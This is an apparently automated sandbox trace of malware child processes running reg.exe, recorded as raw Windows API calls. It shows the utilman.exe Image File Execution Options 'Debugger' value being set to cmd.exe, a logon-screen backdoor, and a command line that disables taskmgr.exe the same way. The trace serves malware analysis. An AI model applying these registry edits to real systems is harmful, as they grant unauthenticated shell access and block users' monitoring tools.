0x245cc0 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0202.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Image File Execution Options\\utilman.exe" [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\utilman.exe" [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] StrChrIW (lpStart="utilman.exe", wMatch=0x5c) returned 0x0 [0202.806] SetLastError (dwErrCode=0x490) [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] SetLastError (dwErrCode=0x0) [0202.806] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0202.806] GetProcessHeap () returned 0x230000 [0202.806] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0xac) returned 0x24bc00 [0202.806] GetProcessHeap () returned 0x230000 [0202.806] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0xd8) returned 0x24bcc0 [0202.806] GetProcessHeap () returned 0x230000 [0202.806] GetProcessHeap () returned 0x230000 [0202.806] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245cc0) returned 1 [0202.807] GetProcessHeap () returned 0x230000 [0202.807] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245cc0) returned 0x28 [0202.807] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245cc0 | out: hHeap=0x230000) returned 1 [0202.807] GetProcessHeap () returned 0x230000 [0202.807] GetProcessHeap () returned 0x230000 [0202.807] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b950) returned 1 [0202.807] GetProcessHeap () returned 0x230000 [0202.807] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b950) returned 0xb6 [0202.807] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b950 | out: hHeap=0x230000) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0202.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0202.807] lstrlenW (lpString="Debugger") returned 8 [0202.807] GetProcessHeap () returned 0x230000 [0202.807] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x12) returned 0x24b720 [0202.807] lstrlenW (lpString="Debugger") returned 8 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0202.807] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0202.808] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0202.808] lstrlenW (lpString="REG_SZ") returned 6 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0202.808] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0202.808] LocalFree (hMem=0x24b950) returned 0x0 [0202.808] SetLastError (dwErrCode=0x0) [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0202.808] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0202.808] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0202.808] GetProcessHeap () returned 0x230000 [0202.808] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x34) returned 0x2479c0 [0202.808] SetLastError (dwErrCode=0x0) [0202.809] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x1ef9c0, lpdwDisposition=0x1ef9e0 | out: phkResult=0x1ef9c0*=0x54, lpdwDisposition=0x1ef9e0*=0x1) returned 0x0 [0202.809] RegQueryValueExW (in: hKey=0x54, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0202.810] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0202.810] RegSetValueExW (in: hKey=0x54, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="%windir%\\system32\\cmd.exe", cbData=0x34 | out: lpData="%windir%\\system32\\cmd.exe") returned 0x0 [0202.810] RegCloseKey (hKey=0x54) returned 0x0 [0202.810] GetProcessHeap () returned 0x230000 [0202.810] GetProcessHeap () returned 0x230000 [0202.810] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24bc00) returned 1 [0202.810] GetProcessHeap () returned 0x230000 [0202.810] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24bc00) returned 0xac [0202.811] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24bc00 | out: hHeap=0x230000) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24bcc0) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24bcc0) returned 0xd8 [0202.811] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24bcc0 | out: hHeap=0x230000) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b720) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b720) returned 0x12 [0202.811] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b720 | out: hHeap=0x230000) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x2479c0) returned 1 [0202.811] GetProcessHeap () returned 0x230000 [0202.811] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x2479c0) returned 0x34 [0202.811] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2479c0 | out: hHeap=0x230000) returned 1 [0202.811] SetLastError (dwErrCode=0x0) [0202.811] GetLastError () returned 0x0 [0202.811] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1ef940, nSize=0x0, Arguments=0x0 | out: lpBuffer="륐$") returned 0x27 [0202.812] GetLastError () returned 0x0 [0202.812] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0202.812] GetProcessHeap () returned 0x230000 [0202.812] GetProcessHeap () returned 0x230000 [0202.812] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b660) returned 1 [0202.812] GetProcessHeap () returned 0x230000 [0202.812] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b660) returned 0x2 [0202.812] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b660 | out: hHeap=0x230000) returned 1 [0202.812] GetProcessHeap () returned 0x230000 [0202.812] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x50) returned 0x24b9b0 [0202.812] SetLastError (dwErrCode=0x0) [0202.812] LocalFree (hMem=0x24b950) returned 0x0 [0202.812] __iob_func () returned 0x7fefdf72a80 [0202.812] _fileno (_File=0x7fefdf72ab0) returned 1 [0202.812] _errno () returned 0x144bb0 [0202.812] _get_osfhandle (_FileHandle=1) returned 0x10c [0202.812] _errno () returned 0x144bb0 [0202.812] GetFileType (hFile=0x10c) returned 0x3 [0202.812] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0202.812] GetConsoleOutputCP () returned 0x1b5 [0202.812] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0202.813] GetConsoleOutputCP () returned 0x1b5 [0202.813] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0xfff02710, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0202.813] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 39 [0202.813] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b880) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b880) returned 0xbc [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b880 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b700) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b700) returned 0x18 [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b700 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245c00) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245c00) returned 0x20 [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245c00 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245c90) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245c90) returned 0x1e [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245c90 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6e0) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b6e0) returned 0x18 [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6e0 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245bd0) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.814] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245bd0) returned 0x20 [0202.814] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245bd0 | out: hHeap=0x230000) returned 1 [0202.814] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b9b0) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b9b0) returned 0x50 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b9b0 | out: hHeap=0x230000) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245a20) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245a20) returned 0x20 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245a20 | out: hHeap=0x230000) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245a50) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245a50) returned 0x20 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245a50 | out: hHeap=0x230000) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245a80) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245a80) returned 0x20 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245a80 | out: hHeap=0x230000) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245ab0) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245ab0) returned 0x20 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245ab0 | out: hHeap=0x230000) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b680) returned 1 [0202.815] GetProcessHeap () returned 0x230000 [0202.815] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b680) returned 0x18 [0202.815] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b680 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245ae0) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245ae0) returned 0x20 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245ae0 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245b10) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245b10) returned 0x20 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245b10 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245b40) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245b40) returned 0x20 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245b40 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245b70) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245b70) returned 0x20 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245b70 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6a0) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b6a0) returned 0x18 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x230000) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245ba0) returned 1 [0202.816] GetProcessHeap () returned 0x230000 [0202.816] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245ba0) returned 0x20 [0202.816] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245ba0 | out: hHeap=0x230000) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245c30) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245c30) returned 0x20 [0202.817] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245c30 | out: hHeap=0x230000) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6c0) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b6c0) returned 0x18 [0202.817] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6c0 | out: hHeap=0x230000) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x245c60) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x245c60) returned 0x20 [0202.817] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x245c60 | out: hHeap=0x230000) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] HeapValidate (hHeap=0x230000, dwFlags=0x0, lpMem=0x24b640) returned 1 [0202.817] GetProcessHeap () returned 0x230000 [0202.817] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x24b640) returned 0x18 [0202.817] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b640 | out: hHeap=0x230000) returned 1 [0202.817] exit (_Code=0) Process: id = "14" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x3c07e000" os_pid = "0x630" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa08" cmd_line = "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 148 os_tid = 0xa50 [0203.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc70 | out: lpSystemTimeAsFileTime=0x28fc70*(dwLowDateTime=0xda372de0, dwHighDateTime=0x1d62524)) [0203.112] GetCurrentProcessId () returned 0x630 [0203.112] GetCurrentThreadId () returned 0xa50 [0203.112] GetTickCount () returned 0x11669ac [0203.112] QueryPerformanceCounter (in: lpPerformanceCount=0x28fc78 | out: lpPerformanceCount=0x28fc78*=32345516691) returned 1 [0203.115] GetModuleHandleW (lpModuleName=0x0) returned 0xff300000 [0203.115] __set_app_type (_Type=0x1) [0203.115] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3100d0) returned 0x0 [0203.116] __wgetmainargs (in: _Argc=0xff312140, _Argv=0xff312150, _Env=0xff312148, _DoWildCard=0, _StartInfo=0xff31215c | out: _Argc=0xff312140, _Argv=0xff312150, _Env=0xff312148) returned 0 [0203.116] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0203.118] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0203.118] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x28fc48 | out: phkResult=0x28fc48*=0x0) returned 0x2 [0203.119] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0203.119] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, 